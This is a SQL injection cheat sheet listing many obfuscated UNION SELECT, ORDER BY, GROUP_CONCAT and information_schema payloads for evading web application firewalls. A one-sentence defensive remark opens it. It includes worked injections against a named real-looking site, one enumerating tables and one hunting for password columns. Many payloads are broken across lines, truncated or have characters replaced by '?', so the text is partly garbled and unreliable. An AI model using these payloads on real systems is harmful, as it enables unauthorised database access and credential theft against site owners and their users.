sqli waf
2019-08-25 03:21:52 -0400
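WAF Bypass Cheat Sheet
The entries below are variants of UNION SELECT that keyword-based WAF rules may fail to match. They rely on mixed case, inline comments, MySQL's executable comment syntax (/*! ... */), whitespace substitutes and single or double URL encoding. A rule set that matches raw keywords without first decoding and normalising the request will miss them. Parameterised queries in the application, not filtering alone, are what close the injection.
Union Select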
+union+distinct+select+
+union+distinctROW
+select+
/**//*!12345UNION
SELECT*//**/
/**//*!50000UNION
SELECT*//**/
+/*!50000UnIoN*/ /*!
50000SeLeCt aLl*/+
+/*!u%6eion*/+/*!se
%6cect*/+
/**/uniUNIONon/**/
aALLll/**/selSELECTect/
**/
1%')and(0)union(select
(1),version(),3,4,5,6)%
23%23%23
/*!50000%55nIoN*/+/*!
50000%53eLeCt*/
union /*!50000%53elect*/
%55nion %53elect
+--+Union+--+Select+--
+
+UnIoN/*&a=*/SeLeCT/
*&a=*/
id=1+?UnI?On?+'SeL?
ECT?
id=1+'UnI'||'on'+SeLeCT'
UnIoN SeLeCt CoNcAt
(version())--
uNiOn aLl sElEcT
uUNIONnion all
sSELECTelect
/*union*/union/*select*/
select+1,2,3/*
/*uniXon*/union/
*selXect*/select+1,2/*
un/**/ion+sel/**/ect
+
#1q%0Aunion all#qa
%0A#%0Aselect
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!
50000select*/
/**//*!12345UNION
SELECT*//**/
/**//*!50000UNION
SELECT*//**/
/**/uniUNIONon/**/
selSELECTect/**/
/**/uniUNIONon/**/
aALLll/**/selSELECTect/
**/
/**//*!union*//**//*!
select*//**/
/**/UNunionION/**/
SELselectECT/**/
/**//*UnIOn*//**//
*SEleCt*//**/
/**//*U*//*n*//*I*//
*O*//*n*//**//*S*//
*E*//*l*//*e*//*C*//
*t*//**/
/**/UNunionION/**/all/
**/SELselectECT/**/
/**//*UnIOn*//**/all/
**//*SEleCt*//**/
/**//*U*//*n*//*I*//
*O*//*n*//**//*all*//
**//*S*//*E*//*l*//
*e*//*C*//*t*//**/
uni
%20union%20/*!select*/
%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select
+
/*!20000%0d%0aunion*/
+/*!20000%0d%0aSel
Ect*/
%252f%252a*/UNION
%252f%252a /SELECT
%252f%252a*/
%23sexsexsex%0AUnIOn
%23sexsexsex%0ASeLecT
+
/*!50000UnIoN*/ /*!
50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se
%6cect*/+
1%?)and(0)union(select
(1),version(),3,4,5,6)%
23%23%23
/*!50000%55nIoN*/+/*!
50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!
select*/
%55nion %53elect
+?+Union+?+Select+?+
+UnIoN/*&a=*/SeLeCT/
*&a=*/
uNiOn aLl sElEcT
uUNIONnion all
sSELECTelect
union(select(1),2,3)
union (select
1111,2222,3333)
union (/*!/**/ SeleCT */
11)
%0A%09UNION%0CS
ELECT%10NULL%
/*!union*//*?*//*!all*//
*?*//*!select*/
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa
%0A#%0Aselect
1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),
(5))
UNION(SELECT(co
lumn)FROM(table))
id=1+?UnI?On?+?SeL?
ECT?
id=1+?UnI?||?on?
+SeLeCT?
union select 1?+%0A,2?+
%0A,3?+%0A etc ?
/*!00000Union*/ /*!
00000Select*/
/*!50000%55nIoN*/ /*!
50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)--
-
+union+distinct+select+
+union+distinctROW
+select+
/**//*!12345UNION
SELECT*//**/
/**//*!50000UNION
SELECT*//**/
/**/UNION/**//*!
50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa
%0A#%0AsEleCt
/*!%55NiOn*/ /*!
%53eLEct*/
/*!u%6eion*/ /*!se
%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**
%2fselect
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A
REVERSE(noinu)+REVERSE
(tceles)
/*--*/union/*--*/select/
*--*/
union (/*!/**/ SeleCT */
1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/
**/
+%2F**/+Union/*!
select*/
/**//*!union*//**//*!
select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW
+select+
uNiOn aLl sElEcT
UNIunionON+SELs
electECT
/**/union/*!
50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni/*!20000%0d%0auni
on*/+/*!20000%0d%0aSel
Ect*/
%252f%252a*/UNION
%252f%252a /SELECT
%252f%252a*/
%0A%09UNION%0CS
ELECT%10NULL%
/*!union*//*--*//*!
all*//*--*//*!select*/
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A1% 2C2%2C
/*!20000%0d%0aunion*/
+/*!20000%0d%0aSel
Ect*/
+UnIoN/*&a=*/SeLeCT/
*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa
%0A#%0Aselect
union(select (1),(2),(3),(4),
(5))
UNION(SELECT(co
lumn)FROM(table))
%23xyz%0AUnIOn%23xyz
%0ASeLecT+
%23xyz%0A%55nIOn
%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select
1111,2222,3333)
uNioN (/*!/**/ SeleCT */
11)
union (select
1111,2222,3333)
+#1q%0AuNiOn all#qa
%0A#%0AsEleCt
/**//*U*//*n*//*I*//
*o*//*N*//*S*//*e*//
*L*//*e*//*c*//*T*/
%0A/**//*!
50000%55nIOn*//
*yoyu*/all/**/%0A/*!
%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn
%23sexsexs ex%0ASeLecT
+
+union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A1% 2C2%2C
/*!f****U%0d%0aun
ion*/+/*!f****U%0d
%0aSelEct*/
+%23blobblobblob
%0aUnIOn%23blobblobblob
%0aSeLe cT+
/*!blobblobblob%0d
%0aunion*/+/*!
blobblobblob%0d
%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/
*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+?UnI?On?+'SeL?ECT?
+uni on+sel ect+
+/*!UnIoN*/+/*!
SeLeCt*/+
/*!u%6eion*/ /*!se
%6cect*/
uni%20union%20/*!
select*/%20
union%23aa%0Aselect
/**/union/*!
50000select*/
/^.*union.*$/ /
^.*select.*$/
/*union*/union/*select*/
select+
/*uni X on*/union/*sel X
ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d
%0a
UNION/*&test=1*/
SELECT/*&pwn=2*/
un?+un/**/ion+se/**/
lect+
+UNunionION+SEs
electLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f
%252a /select%252f%252a
*/
/%2A%2A/union/%2A%2A/
select/%2A%2A/
%2f**%2funion%2f**
%2fselect%2f**%2f
union%23foo*%2F*bar
%0D%0Aselect%23foo%0D
%0A
/*!UnIoN*/SeLecT+
Union Select bypass with the URL-encoded method:
%55nion(%53elect)
union%20distinct%20select
union%20%64istinctRO
%57%20select
union%2053elect
%23?%0auion%20?%23?
%0aselect
%23?zen?%0Aunion all
%23zen%0A%23Zen
%0Aselect
%55nion %53eLEct
u%6eion se%6cect
unio%6e %73elect
unio%6e%20%64istinc
%74%20%73elect
uni%6fn distinct%52OW s
%65lect
%75%6e%6f%69%6e
%61%6c%6c %73%65%6c
%65%63%7
Cheat sheet for bypassing filters on ORDER BY and GROUP BY
order by/**_**/
/*!12345order*/ /*!
12345by*/
) order by 1-- -
') order by 1-- -
')order by 1%23%23
%')order by 1%23%23
Null' order by 100--+
Null' order by 9999--+
')group by 99-- -
'group by 119449-- -
'group/**/by/
**/99%23%23
CONCAT and GROUP_CONCAT bypass cheat sheet:
/*!12345group_concat*/
(/*!12345table_name*/)
/*!50000group_concat*/
(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/
()
/*!50000gRouP_cOnCaT*/
()
/*!50000Gr%6fuP_c
%6fnCAT*/()
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!
12345table_name*/)
group_concat(/*!
50000table_name*/)
/*!group_concat*/(/*!
12345table_name*/)
/*!group_concat*/(/*!
50000table_name*/)
unhex(hex(group_concat
(table_name)))
unhex(hex(/*!
group_concat*/(/*!
table_name*/)))
unhex(hex(/*!
12345group_concat*/
(table_name)))
unhex(hex(/*!
12345group_concat*/(/*!
table_name*/)))
unhex(hex(/*!
12345group_concat*/(/*!
12345table_name*/)))
unhex(hex(/*!
50000group_concat*/
(table_name)))
unhex(hex(/*!
50000group_concat*/(/*!
table_name*/)))
unhex(hex(/*!
50000group_concat*/(/*!
50000table_name*/)))
CONVERT(group_concat
(table_name)+USING
+latin1)
CONVERT(group_concat
(table_name)+USING
+latin2)
CONVERT(group_concat
(table_name)+USING
+latin3)
CONVERT(group_concat
(table_name)+USING
+latin4)
CONVERT(group_concat
(table_name)+USING
+latin5)
convert(group_concat
(table_name)+using+ascii)
convert(group_concat(/*!
table_name*/)+using
+ascii)
convert(group_concat(/*!
12345table_name*/
)+using+ascii)
convert(group_concat(/*!
50000table_name*/
)+using+ascii)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3
a3a,version()
CONCAT_WS(CHAR(
32,58,32),version(),)
How to bypass filters on tables:
group_concat(/*!
table_name*/)
+/*!froM*/ /*!
InfORmaTion_sc
Hema*/.tAblES? -
/*!froM*/ /*!
InfORmaTion_sc
Hema*/.tAblES /*!
WhERe*//*!
TaBle_ScHEmA*/=schEMA
()?
/*!From*/+
%69nformation_schema./
**/tAblES+/*!
50000Where*/+/*!
%54able_ScHEmA*/
=schEMA()? -
How to bypass filters on columns:
group_concat(/*!
column_name*/)
+/*!froM*/
InfORmaTion_scHema.cOlumnS
/*!WheRe*/ /*!
tAblE_naMe*/=hex table
/*!From*/+
%69nformation_schema./
**/columns+/*!
50000Where*/+/*!
%54able_name*/=hex
table/*!froM*/ table? -
URL-encoded bypass for tables and columns:
(select+group_concat(/*!
table_name*/)+/*!From*/
+%69nformation_schema./
**/tAblES+/*!
50000Where*/+/*!
%54able_ScHEmA*/
=schEMA())
(select+group_concat(/*!
column_name*/)+/*!
From*/+%69nformation_s
chema./**/columns+/*!
50000Where*/+/*!
%54able_name*/=hex
table)
Example:
http://www.marinaplast.
com/page.php?id=-13
union select 1,2,(select
+group_concat(/*!
table_name*/)+/*!From*/
+%69nformation_schema./
**/tAblES+/*!
50000Where*/+/*!
%54able_ScHEmA*/
=schEMA()),4,5 ?
Illegal mix of collations bypass:
unhex(hex(Concat
(Column_Name,0
x3e,Table_schem
a,0x3e,table_Name)))
/*!from*/
information_sche
ma.columns/*!where*/
column_name%20/*!like*/
char(37,%20112,%2097,
%20115,%20115,%2037)
http://www.marinaplast.
com/page.php?id=-13
union select 1,2,unhex(hex
(Concat(Column_Na
me,0x3e,Table_s
chema,0x3e,tabl
e_Name))),4,5 /*!from*/
information_sche
ma.columns/*!where*/
column_name%20/*!like*/
char(37,%20112,%2097,
%20115,%20115,%2037)?